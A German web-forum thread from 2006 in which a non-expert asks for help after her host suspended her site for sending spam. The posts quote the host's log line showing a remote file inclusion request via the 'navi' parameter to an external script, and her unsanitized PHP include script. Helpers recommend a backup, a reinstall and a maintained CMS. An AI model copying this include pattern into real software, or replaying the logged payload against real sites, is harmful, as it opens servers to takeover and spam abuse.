Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 14

Thema: Temp. Abschaltung d. Webpacks da Scripte Spam verschicken?

  1. #1

    Standard Temp. Abschaltung d. Webpacks da Scripte Spam verschicken?

    Falls ich hiermit im falschen Unterforum gelandet bin, verzeiht es mir, denn ich bin gerade etwas durch den Wind. Problem ist folgendes:

    Ich wollte eben auf meine Seiten zugreifen.
    www.fractured-sanity.org (alias)
    www.prophecy-designs.de (alias)
    www.slayerzone.de

    ... und stellte fest, dass ich eine forbidden-Meldung bekam. Daraufhin habe ich meine Emails kontrolliert und fand diese email.

    Sehr geehrte Frau Schmidt,

    wir mussten feststellen, dass über Ihre Domain slayerzone.de
    Spam- / Phishing-eMails verschickt werden können.

    Es handelt sich *wahrscheinlich* um das Script
    /fractured/index.php - wir haben den Zugriff darauf gesperrt.

    Anbei der entspr. Auszug aus dem Log:

    201.19.136.146 - - [27/Apr/2006:20:54:52 +0200] "POST /index.php?navi=http://paginas.terra.com.br/arte/lacomagela/script.gif? HTTP/1.1" 200 1061092 "http://www.fractured-sanity.org/index.php?navi=http://paginas.terra.com.br/arte/lacomagela/script.gif?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2" "www.fractured-sanity.org"


    Bitte entfernen Sie dieses Script vollständig, oder
    sichern es so ab, dass es nicht weiter zum Versand von
    SPAM missbraucht werden kann, und überprüfen Sie alle
    anderen eingesetzen Scripte auf ihre Sicherheit hin.
    Da ich ein absoluter Laie auf dem Gebiet bin, zumindest was Scripte betrifft (ich habe sie von freien Scriptanbietern wie dynamic drive, pixelfx.org, etc.) war ich sehr verunsichert und wusste nicht was ich tun sollte. Ich habe den Support angerufen und dort hat man mir gesagt, es handele sich um Scripte meines Forums, die ich löschen sollte. Der nette Mensch am Support-Telefon hat mir noch eine Email geschickt mit den betreffenden Dateien:

    Sehr geehrte Frau Schmidt,

    bezugnehmend unseres Telefonates hier die zu löschenden Dateien oder aber zur Überprüfung:

    ./www.slayerzone.de/forum/templates/online.txt
    ./www.slayerzone.de/forum/templates/ip.txt
    ./www.slayerzone.de/forum/templates/...
    ./www.slayerzone.de/forum/templates/.../online.txt
    ./www.slayerzone.de/forum/templates/.../ip.txt
    ./www.slayerzone.de/forum/templates/.../.ssh
    ./www.slayerzone.de/forum/templates/.../.ssh/.cset_number
    ./www.slayerzone.de/forum/templates/.../.ssh/online.txt
    ./www.slayerzone.de/forum/templates/.../.ssh/ip.txt

    Mit freundlichen Grüßen

    #####
    Kundenservice Webhosting
    - Privat- und Geschäftskunden -
    Die betreffenden Datein:
    ./www.slayerzone.de/forum/templates/online.txt
    ./www.slayerzone.de/forum/templates/ip.txt
    habe ich gelöscht, aber bis auf diese beiden Dateien ist der Template-Ordner leer gewesen, also weiß ich nicht wo die anderen herkommen bzw. sein sollen.

    Desweiteren lag ein neues TXT-file Names: nobody-dateien.txt auf meiner Webseite mit der Listung einzelner Seiten/Links auf meinem Webpack. Darunter fanden sich dann auch meine News-System Cutenews.

    ...
    ./www.slayerzone.de/fractured/cutenews/data/archives/1143747678.comments.arch
    ./www.slayerzone.de/fractured/cutenews/data/archives/online.txt
    ./www.slayerzone.de/fractured/cutenews/data/archives/ip.txt
    ./www.slayerzone.de/fractured/cutenews/data/archives/data
    ./www.slayerzone.de/fractured/cutenews/data/archives/data/online.txt
    ...
    Ich bin mir nicht wirklich sicher was ich jetzt machen soll. Muss ich nun mein Newssystem löschen? Und was mache ich mit den Forum Templates?
    Life is a bitch...

  2. #2
    Unglaublich wichtig!
    Registriert seit
    08.11.2005
    Ort
    127.0.0.1
    Beiträge
    1,446

    Standard

    Als erstes würde ich eine Sicherung der Daten auf deinem Systems machen.

    Dann lass dir vom Betreiber deines Servers eine cleane Version des Betriebssystems (ich denke Linux) installieren. Wenn ich davon ausgehe, das die Scripts clean sind denke ich das sich jemand auf deinem Server breit gemacht hat. Damit ist alles futsch.

    So, jetzt ziehst du alles nochmal auf. Du installierst dein Forum/News Modul neu und holst dir deine Daten aus der Sicherung.

    Der schwierige Teil: Sichere dein System ab! Patchen, Rechte vergeben, etc. Und besonders wichtig: halte dich über Sicherheitslücken auf dme laufendem! Wenn dir das zuviel ist (kann ich verstehen ist viel Arbeit und verschlingt viel Zeit) dann frage bei deinem Hoster nach, die meisten bieten server, die administriert werden. Das kostet mehr, dafür ists sicher und deine Daten werden regelmäsig gesichert.

    Tja, ich hoffe ich konnte dir weiterhelfen. Wenn du noch Fragen hast, einfach hier posten.

    Ich habs mal verschoben.

    [edit]

    Ok, ich denke es gibt kein bewsserer Forum

    [/edit]
    Warum kam es zu dem Problem?
    Welche Programme sind an dem Geschehen beteiligt?
    Was ist der Wortlaut der Fehlermeldungen?
    Wie heisst Deine Distribution?
    Warten Sie auf Rückfragen der Rettungsleitstelle.

  3. #3

    Standard

    leider ist für mich weder das einarbeiten zur zeit eine option, da ich im examen stecke (uni), noch habe ich das geld mir ein teureres webpack zu holen. das was ich im moment bezahle ist schon zu teuer, eigentlich.

    Aber bin gerade das backup am machen. Und was soll das mit der cleanen version. Ich habe nur ein Webpack aber keinen Server. Dann müssten die für mich den kompletten Server (auf dem noch andere Seiten liegen) neu machen? Glaube kaum, dass sie das tun.

    Und nur zur anmerken, ich bin Laie auf dem Gebiet.
    Life is a bitch...

  4. #4
    Unglaublich wichtig!
    Registriert seit
    08.11.2005
    Ort
    127.0.0.1
    Beiträge
    1,446

    Standard

    Ok. Bin von anderen Vorraussetzungen ausgegangen.

    Du hast nur dieses webpack. Was ist das genau? Ich dachte du hast nen Root-server oder sowas.

    Wie heist denn das ganze? Und was machst du genau? Verschickst du Emails? Bitte erklär das ganze mal ein bisserl.
    Warum kam es zu dem Problem?
    Welche Programme sind an dem Geschehen beteiligt?
    Was ist der Wortlaut der Fehlermeldungen?
    Wie heisst Deine Distribution?
    Warten Sie auf Rückfragen der Rettungsleitstelle.

  5. #5

    Standard

    nein, ich habe ein webpack bei www.hosteurope.de, es hat cgi und php unterstützung. http://www.hosteurope.de/index.php?f...&menu=1&prod=3

    Auf meinem Webspace habe ich eine ganz normale Website betrieben und ein Forum von wbb. Auf dieser Website habe ich mit einem dynamischen PHP-include script gearbeitet um meine verschiedenen Navis und die Unterseiten einzubinden, weil es das leben deutlich einfacher macht, wenn man so viele von diesen unterseiten hat.


    PHP-Code:
    <?php 
        $page 
    basename($navi); 
        if(!
    $navi
        include(
    "1.php"); 
        else 
        include(
    "$navi.php"
        
    ?>

    Auf der Seite lief zusätzlich das Newssystem Cutenews: http://cutephp.com/cutenews/


    Die von Hosteurope haben meine Seite abgeschaltet, da über das PHP-include script wohl eine seite eingebunden wurde oder werden kann, die spam verschickt. Darüber hinaus seien auch noch diverese andere teile der forensoftware unsicher und anscheinend auch das newssystem cutenews.


    ----

    ich bin sowohl was PHP als auch was Datenbanken betrifft laie, da mir im Moment wegen meinem Examen einfach die Zeit fehlt mich in sowas einzuarbeiten. Das include script sowie das newssystem habe ich von anderen seiten.
    Life is a bitch...

  6. #6
    Unglaublich wichtig!
    Registriert seit
    08.11.2005
    Ort
    127.0.0.1
    Beiträge
    1,446

    Standard

    Gib mir mal ein bisserl Zeit, ich schau, ob ich was rausfinde. Evtl. musst du deine Page ein bisserl umstricken müssen.
    Warum kam es zu dem Problem?
    Welche Programme sind an dem Geschehen beteiligt?
    Was ist der Wortlaut der Fehlermeldungen?
    Wie heisst Deine Distribution?
    Warten Sie auf Rückfragen der Rettungsleitstelle.

  7. #7

    Standard

    damit habe ich mich schon abgefunden. ;( mir wurde woanders geraten das include script umzuprogammieren, aber nicht wie... irgendwas mit variablen absichern.

    zur not könnte ich auch ohne newssystem leben, aber ich fands toll endlich eins zu haben.

    was ich mit dem forum machen soll, weiiß ich allerdings nicht, aber vielleicht kann mir da jochen weiterhelfen

    ---

    danke, dass du helfen willst
    Life is a bitch...

  8. #8
    Unglaublich wichtig!
    Registriert seit
    08.11.2005
    Ort
    127.0.0.1
    Beiträge
    1,446

    Standard

    Hast du ein CMS laufen oder ist deine Seite selbstgecoded?

    Das Forum sollte sich soweit absichern lassen.

    [edit]

    Zum helfen sidn wir ja da!

    [/edit]
    Warum kam es zu dem Problem?
    Welche Programme sind an dem Geschehen beteiligt?
    Was ist der Wortlaut der Fehlermeldungen?
    Wie heisst Deine Distribution?
    Warten Sie auf Rückfragen der Rettungsleitstelle.

  9. #9

    Standard

    nein, alles per hand gecoded, in nem stink normalen text editor, ohne irgendwelche programme, old school halt.
    Life is a bitch...

  10. #10
    Unglaublich wichtig!
    Registriert seit
    08.11.2005
    Ort
    127.0.0.1
    Beiträge
    1,446

    Standard

    Ich denke das einfachste wäre ein fertiges CMS zu verwenden. Da ist die Codebasis von Profis erstellt und aufeinander abgestimmt. Du erhälst Updates, wenns Probleme gibt und du hast ein eingebautes News-System. Bei der Auswahl des CMS kann dir evtl. da Jochen helfen. Da dein Webteil PHP und MySQL kann denke ich, das das die beste Lösung ist.

    Die Scripte "sicher" zu machen ist der größere Aufwand. Gut, ich bin kein PHP Programmierer, ich denke es müssen alle Scripte überprüft werden.
    Warum kam es zu dem Problem?
    Welche Programme sind an dem Geschehen beteiligt?
    Was ist der Wortlaut der Fehlermeldungen?
    Wie heisst Deine Distribution?
    Warten Sie auf Rückfragen der Rettungsleitstelle.

Ähnliche Themen

  1. the best of spam
    Von Jochen im Forum Offtopic
    Antworten: 35
    Letzter Beitrag: 22.04.2009, 15:40
  2. Spam goes Telefon
    Von purple_rose im Forum Offtopic
    Antworten: 6
    Letzter Beitrag: 27.02.2008, 07:37
  3. SBS2003, Daten über Exchange verschicken
    Von niLs im Forum Windows Server
    Antworten: 0
    Letzter Beitrag: 19.05.2005, 09:10
  4. Spam - Sober.h
    Von Jochen im Forum Firewalling | Security | Netzwerk allg.
    Antworten: 11
    Letzter Beitrag: 07.07.2004, 14:57

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •